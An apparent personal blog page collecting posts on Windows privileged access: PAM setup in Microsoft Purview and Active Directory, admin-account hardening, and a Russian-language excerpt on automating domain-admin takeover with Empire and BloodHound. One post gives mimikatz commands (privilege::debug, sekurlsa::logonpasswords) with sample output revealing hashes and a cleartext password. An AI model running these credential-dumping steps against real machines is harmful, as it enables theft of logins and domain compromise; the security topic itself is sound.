Configure privileged access management

2024-05-13 22:09
bga68comp: (Default)
Configure privileged access management Microsoft Purview

Виконайте такі кроки, щоб налаштувати керування привілейованим доступом для вашої організації:

original-https: / /learn.microsoft.com/en-us/purview/media/ir-solution-pam-steps.png

  1. Дізнайтеся про керування привілейованим доступом
  2. Створіть групу затверджувачів
  3. Увімкнути керування привілейованим доступом
  4. Створіть політику доступу
  5. Надсилайте/затверджуйте запити на привілейований доступ


Див. також:
Configure privileged access management Microsoft Purview

💻 На стартову сторінку

 
Tags:
  • Add Memory
  • Share This Entry

Розвіюємо міфи про привілейовані облікові записи

2023-12-02 19:45
bga68comp: (Default)
Источник:
https://www.linkedin.com/feed/update/urn:li:activity:7136557095113424896
Irudaya Praveen

Cybersecurity Program Manager



 
Demystifying Privileged Accounts: Explore the Different Types and Their Crucial Role in Cybersecurity.

Understanding the nuances of privileged accounts is pivotal for anyone concerned about safeguarding their organization's most critical assets. It's about securing the keys to the digital kingdom.

Розвіюємо міфи про привілейовані облікові записи: вивчіть різні типи та їхню вирішальну роль у кібербезпеці.

Розуміння нюансів привілейованих облікових записів має вирішальне значення для всіх, хто піклується про захист найважливіших активів своєї організації. Йдеться про захист ключів до цифрового царства.
 
Tags:
  • Add Memory
  • Share This Entry

ИБ: Автоматизация получения прав администратора домена в Active Directory

2018-02-13 14:27
bga68comp: (Default)
image
С момента появления фреймворка Empire и приложения BloodHound пентесты систем на базе Active Directory становятся все проще и прямолинейнее для 95% сред.

21.09.2017
Автор: byt3bl33d3r

С момента появления фреймворка Empire и приложения BloodHound пентесты систем на базе Active Directory становятся все проще и прямолинейнее для 95% сред. Поскольку каждый раз выполняются одни и те же операции, я решил, что настало время автоматизировать процесс. Мне кажется, что скрипт, работающий по принципу «запустил и забыл», который автоматически получает права администратора домена, является мечтой для каждого специалиста по безопасности.

К тому моменту когда я решил реализовать свою задумку, некоторые товарищи, упомянутые в конце статьи, уже проделали большую часть работ. Кроме того, некоторое время назад во фреймворке Empire появился RESTful API, который упрощает создание сторонних скриптов.

Перед тем как продолжить, я бы хотел упомянуть о том, что во время пентестов получение прав администратора домена не должно быть единственной целью (в противном случае следует еще раз подумать над своими целями). Нужно сосредоточиться на пост-эксплуатации в целом и получении персональной конфиденциальной информации, документов и так далее. То есть все, что можно продемонстрировать «менеджменту» как влияющее на деятельность организации в случае, если произойдет реальное компрометирование. С другой стороны, доступ с правами администратора домена серьезно упрощает жизнь, позволяет показать дополнительную ценность клиенту и придает уверенность исследовательской группе.

Цели проекта и практическая реализация

Изначально я хотел создать нечто, что будет брать выходные данные утилиты BloodHounds, выполнять парсинг и отдавать результаты во фреймворк Empire с последующим выполнением определенной «цепочки» операций. Хотя в BloodHound , насколько мне известно, не предусмотрено использование возможностей, которые можно получить при помощи эскалации привилегий домена, например, GPP-пароли в хранилище SYSVOL (лично я считаю, что эта тема встречается практически повсюду).
Read more... )
Tags:
  • Add Memory
  • Share This Entry

Защита административных учетных записей в сети Windows

2017-12-18 14:45
bga68comp: (Default)

Защита административных учетных записей в сети Windows

date

В этой статье я постарался собрать основные организационные и технические правила использования учетных записей администраторов в организации, направленные на повышение безопасности в домене Windows. Использование данных рекомендаций значительно повысит защиту компьютеров домена Active Directory от атак, аналогичных летнему инциденту с шифровальщиком Petya, одной из техник распространения которого между компьютерами домена (помимо уязвимости в SMBv1) был удаленный доступ с помощью полученных из памяти учетных данных администраторов (с помощью утилиты аналогичной Mimikatz). Возможно некоторые из рекомендаций спорные или неприменимые для конкретных случаев, но к ним все-таки нужно стремиться.

Итак, в предыдущей статье мы рассмотрели основные методики защиты от извлечения паролей из памяти с помощью Mimikatz. Однако все эти технические меры могут быть бесполезными, если в домене Windows не применяются базовые правила обеспечения безопасности административных учетных записей.

Основное правило, которым следует пользоваться – максимальное ограничение административных привилегий, как для пользователей, так и администраторов. Нужно стремится к тому, что предоставлять пользователям и группам поддержки только те права, которые необходимы для выполнения повседневных задач.

Базовый список правил:


  • Учетные записи администраторов домена/организации должны использоваться только для управления доменом и контроллерами домена. Нельзя использовать эти учетные записи для доступа и управления рабочими станциями. Аналогичное требование должно предъявляться для учетных записей администраторов серверов

  • Для учетных записей администраторов домена желательно использовать двухфакторную аутентификацию

  • На своих рабочих станциях администраторы должны работать под учетными записями с правами обычного пользователя

  • Для защиты привилегированных учетных записей (администраторы домена, Exchange, серверов) нужно рассмотреть возможность использования группы защищенных пользователей (Protected Users)

  • Запрет использования обезличенных общих административных аккаунтов. Все аккаунты администраторов должны быть персонифицированы

  • Нельзя запускать сервисы под учетными записями администраторов (а тем более администратора домена), желательно использовать выделенные учетные записи или Managed Service Accounts .

  • Запрет работы пользователей под правами локального администратора

Read more... )

Tags:
  • Add Memory
  • Share This Entry

Временное членство в группах Active Directory | Windows для системных администраторов

2017-12-18 12:01
bga68comp: (Default)
Оригинал: http://winitpro.ru/index.php/2016/10/19/vremennoe-chlenstvo-v-gruppax-active-directory/



Временное членство в группах Active Directory

date

В версии Active Directory, представленной в Windows Server 2016 появился ряд довольно интересных изменений. Сегодня мы рассмотрим возможность обеспечить временное членство пользователей в группах Active Directory. Этот функционал можно использовать, когда нужно предоставить пользователю на определенное время некие права, основанные на членстве в группе безопасности AD, а по истечению времени, автоматически (без привлечения администратора) этих прав его лишить.

Временное членство в группах AD (Temporary Group Membership) реализуется с помощью новой функции Windows Server 2016 под названием Privileged Access Management Feature. По аналогии с AD Recycle Bin после активации, отключить PAM нельзя.

Проверить, включен ли функционал PAM в текущем лесу, можно с помощью следующей команды  PowerShell:

Get-ADOptionalFeature -filter *

Get-ADOptionalFeature

Нас интересует значение параметра EnableScopes, в этом примере оно пустое. Это значит, что функционал Privileged Access Management Feature для домена не включен.

Read more... )

Tags:
  • Add Memory
  • Share This Entry

Как извлечь пароли пользователей Windows из памяти

2015-03-20 17:37
bga68comp: (Default)
Идея описана в статье: Идея: Извлечь пароли пользователей Windows из памяти

Программы для решения задачи:

Утилита Windows Credentials Editor – одно из наиболее известных и универсальных решений.
Но по мне ... недостаточно универсальное. И даже сложное. Конечно, антивирусы от Microsoft распознают WCE как вредоносную программу, да только кто ж их слушает...

О самой программе и ее возможностях можно узнать по ссылке:
Windows Credentials Editor (WCE) F.A.Q.

Мне, все-таки, больше понравилась другая программа, как по скорости, так и по функционалу - ввел две команды и готово:

mimikatz - как сказали авторы обзора - "совершенно убойная наработка" французских исследователей, описанная в вышеуказанной статье, вынесенной в заголовок.
Всецело согласен. Убойная.

Mimikatz

Итак. Стартовая страница программы - Blog de Gentil Kiwi

Нас интересует исполняемый файл:
◾ binaires : https://github.com/gentilkiwi/mimikatz/releases/latest

После распаковки архива, который существует в двух вариантах - для x86 и x64 Windows - запускаем командную строку от имени администратора.

Синтаксис:

mimikatz # privilege::debug
Privilege '20' OK
 
mimikatz # sekurlsa::logonpasswords
 
Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session           : Interactive from 2
User Name         : Gentil Kiwi
Domain            : vm-w7-ult-x
SID               : S-1-5-21-1982681256-1210654043-1600862990-1000
        msv :
         [00000003] Primary
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
        tspkg :
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * Password : waza1234/


Вот и все: Password действительно проверялся и в домене и в рабочей группе. Совпадает.

Перейти к Оглавлению
Tags:
  • Add Memory
  • Share This Entry

Profile

bga68comp: (Default)
bga68comp

December 2025

S M T W T F S
  12 3 456
7891011 1213
14151617181920
21222324252627
28293031   

Syndicate

RSS Atom

Most Popular Tags

Page Summary

Style Credit

Expand Cut Tags

No cut tags
Page generated 2025-12-30 00:29
Powered by Dreamwidth Studios